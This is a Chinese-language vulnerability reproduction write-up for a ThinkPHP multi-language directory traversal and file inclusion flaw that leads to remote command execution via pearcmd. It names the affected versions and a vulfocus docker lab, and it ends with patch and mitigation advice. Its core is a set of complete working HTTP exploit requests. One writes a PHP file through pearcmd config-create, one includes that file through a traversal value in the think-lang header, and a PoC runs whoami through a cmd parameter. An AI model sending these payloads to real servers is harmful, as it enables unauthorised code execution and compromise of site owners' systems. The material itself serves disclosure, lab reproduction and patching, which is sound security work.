简介
Thinkphp 是一款 PHP 框架，如果开启了多语言功能，就可以通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含，从而利用 pearcmd 文件包含实现远程命令执行（RCE）。[出自:jiwo.org]

1、需要Thinkphp开启多语言功能
2、需要有pearcmd扩展

影响版本
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x

复现
环境

docker run -it -d -p 8080:80  vulfocus/thinkphp:6.0.12
访问8080
1
2
文件包含
生成文件

GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 222.x.x.x:8080
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 0
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Cookie: think_lang=zh-cn;
Connection: close
1
2
3
4
5
6
7
8
9
10
11
包含文件


GET /public/index.php HTTP/1.1
Host: 222.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
think-lang:../../../../../../../../tmp/hello
Cookie: think_lang=zh-cn;
Connection: close
1
2
3
4
5
6
7
8
9
10
目录穿越
/index.php?s=index/index/index/think_lang/…/…/extend/pearcmd/pearcmd/index&cmd=whoami

POC

GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
2
3
4
5
6
7
8
9
修复
1、若无必要，可关闭多语言功能，可参考文档
https://www.kancloud.cn/manual/thinkphp6_0/1037637
https://static.kancloud.cn/manual/thinkphp5/118132
2、官方已发布6.0.14、5.1.42，建议升级至安全版本。